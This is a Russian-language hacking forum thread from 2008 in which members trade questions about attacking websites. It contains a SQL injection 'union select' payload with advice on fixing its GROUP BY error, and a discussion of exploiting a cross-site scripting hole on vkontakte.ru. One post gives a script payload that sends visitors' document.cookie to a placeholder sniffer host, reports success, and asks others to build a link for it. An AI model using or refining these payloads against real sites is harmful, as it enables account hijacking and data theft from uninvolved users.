Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    Там и есть 2 колноки, но при запросе page.php?id=-1'+union+select+1,2/* :

    Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause
     
  2. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    нужно указать группировку по полю (у вас конец запроса обрывается комментариями), т.е.
    ляляля + group by поле/*
     
    #3862 l1ght, 28 Nov 2008
    Last edited: 28 Nov 2008
  3. winter_silence

    winter_silence New Member

    Joined:
    22 Nov 2008
    Messages:
    21
    Likes Received:
    4
    Reputations:
    0
    Я не уверен в том что это серьезный баг, вконтакте если зайти в свой аккаунт, раздел "мои группы" - справа вверху форма "фильтр групп".
    В этой форме выполняется
    Код формы

    Собственно вопрос такой: можно ли сформировать ссылку XSS?
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ничего себе несерьезная уязвимость:) Есс-но можно
     
  5. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2

    если кто смог,выложите сформированную ссылку,у меня не получилось(
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Видишь ли, я просто там незареген, вывод - ссылку в студию +ПОЛНЫЙ исходник страницы
     
  7. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    http://vkontakte.ru/groups.php?

    исходник большой очень( стоит ли его сдесь выкладывать
     
    #3867 qazer, 28 Nov 2008
    Last edited: 28 Nov 2008
  8. winter_silence

    winter_silence New Member

    Joined:
    22 Nov 2008
    Messages:
    21
    Likes Received:
    4
    Reputations:
    0
    2qazer
    именно это. Исходник действительно большой, да и толку от него маловато.
    Алерт выскакивает на странице прям в тот момент когда его вставляешь. Там Ajax вроде
     
  9. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    тоесть получается прамую ссылку не поставить?алерт выскакивает если его ввести в поле и нажать enter - так тоже катит
     
  10. winter_silence

    winter_silence New Member

    Joined:
    22 Nov 2008
    Messages:
    21
    Likes Received:
    4
    Reputations:
    0
    Я вот это впринципе и хотел узнать. Скрипт обрабатывается "на ходу". Но ведь обрабатывается и выполняется. Есть ли способ передать скрипт через ссылку в эту форму?
     
  11. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    я на самом деле тоже самое хочу узнать)))

    помоему надо просто узнать название этого поля и подставить его,чтото типо этого --

    http://vkontakte.ru/groups.php?название поля=<script>alrtr(/)</script>
     
    #3871 qazer, 28 Nov 2008
    Last edited: 28 Nov 2008
  12. winter_silence

    winter_silence New Member

    Joined:
    22 Nov 2008
    Messages:
    21
    Likes Received:
    4
    Reputations:
    0
    Я пробовал так, у меня не получилось. Тут моих познаний java script не хватает к сожалению.
     
  13. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    Смотрю: олени в теме :D

    Вообщем если пашка дуров не поставил:
    PHP:
    <?php
    echo $_GET['имя_поля'];
    ?>
    То ничего не сделал, а он действительно не поставил :)
     
  14. winter_silence

    winter_silence New Member

    Joined:
    22 Nov 2008
    Messages:
    21
    Likes Received:
    4
    Reputations:
    0
    Хм, я возможно и не шарю, но если я не ошибся тема как раз таки для вопросов по уязвимостям. Так что думаю можно и без оленей обойтись)

    А здесь можно поподробней? Возможно данные в форму передать каким нибудь образом?
     
  15. .::Colt::.

    .::Colt::. New Member

    Joined:
    2 Jun 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Это уже пофиксено все... думаю надо копать глубже.. и еще всетаки интересно в привате есть сплойты или нет..
     
  16. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2

    всё работает!!!!

    "><script>img = new Image(); img.src = "http://блаблаблабла?"+document.cookie;</script>

    и куки на снифе!!!


    ктонить составьте ссылку
     
  17. .::Colt::.

    .::Colt::. New Member

    Joined:
    2 Jun 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    я говорил про вконтакте.ру
     
  18. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    никаким, если только юзер сам не вставит код :)
     
  19. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Нашел уязвимость с Ассеsse, пытаюсь авторизоваться по типу:
    Но выбрасывает на ошибку с
    Расшифруйте, пожалуйста, что тут не так. если дословно: общая ошибка открытом регистрационном ключе, DNS процесса и бла-бла-ла
     
  20. none222

    none222 Guest

    Reputations:
    0
    Calcutta, всё поддерживается, не сбивай людей с толку!
     
Thread Status:
Not open for further replies.